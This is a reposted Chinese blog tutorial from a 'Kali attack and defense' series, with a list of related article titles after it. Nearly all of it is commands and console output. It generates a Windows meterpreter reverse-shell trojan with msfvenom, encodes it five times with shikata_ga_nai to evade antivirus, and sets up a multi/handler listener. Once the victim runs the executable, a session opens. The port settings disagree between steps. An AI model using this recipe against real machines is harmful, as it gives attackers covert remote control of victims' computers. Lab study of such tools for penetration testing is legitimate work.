kali攻防第9章 Metasploit之我的远程控制软件
来源:互联网 发布:京东秒杀的软件 编辑:程序博客网 时间:2024/04/29 22:07
准备工具
1、KALI系统 IP 10.10.10.131
2、受害系统 IP 10.10.10.133
步骤:
1、生成木马控制程序
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=443 -f exe > abc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
注意: LHOST和LPORT是本地自己的IP不是受害者的IP
2、通过命令启动Metasploit
root@kali:~# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
Save 45% of your time on large engagements with Metasploit Pro
Learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2015103001 ]
+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
3、使用handler模块
msf > use exploit/multi/handler
4、查看handler参数
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
5、shellcode设置
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > SHOW
[-] Unknown command: SHOW.
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.131 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
6、修改LHOST和LPORT端口
msf exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf exploit(handler) > set LPORT 55555
LPORT => 55555
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.131 yes The listen address
LPORT 55555 yes The listen port
7、执行exploit命令
msf exploit(handler) > exploit
8、受害者执行abc.exe文件
9、验证
[*] Started reverse handler on 10.10.10.131:443
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 10.10.10.133
[*] Meterpreter session 1 opened (10.10.10.131:443 -> 10.10.10.133:1049) at 2015-12-07 23:41:20 +0800
- kali攻防第9章 Metasploit之我的远程控制软件
- kali攻防第12章 Metasploit之服务器蓝屏攻击
- kali攻防第13章 Metasploit之生成webshell及应用
- kali攻防第8章 Metasploit新手知识扫盲
- kali攻防第14章 SQLMAP之漏洞服务器
- kali攻防第1章 内网称霸之图片获取
- kali攻防第2章 内网称霸之渗透安卓系统
- kali攻防第3章 内网称霸之Cookie截取
- kali攻防第4章 内网称霸之HTTP信息截取
- kali攻防第5章 内网称霸之HTTPS账号密码获取
- kali攻防第7章 SQLMAP介绍之PHP网站渗透
- kali攻防第7章补充 SQLMAP介绍之Cookie注入
- 第5章 远程控制软件的编写
- kali攻防第10章 Burp Suite功能的简单介绍
- kali漏洞利用之Metasploit实战
- kali 2.0中metasploit的使用教程
- kali攻防第6章 SQLMAP介绍及ASP网站渗透
- kali攻防第11章 攻击实例讲解-ms10_046快捷方式图标漏洞
- Oracle查询前10条数据
- 快捷安装/卸载/重启Windows Service服务
- 回显
- theano —— shared, function(outputs, updates, givens)
- VS2012最常用的快捷键
- kali攻防第9章 Metasploit之我的远程控制软件
- Java基础_02_Java编程基础
- 大型网站系统架构演化之路
- IOS界面生命周期
- Mysql 多行插入数据
- 看看initramfs加载的完整流程
- Xcode中常用的快捷键操作
- 【转】awk简介
- vector中erase用法注意事项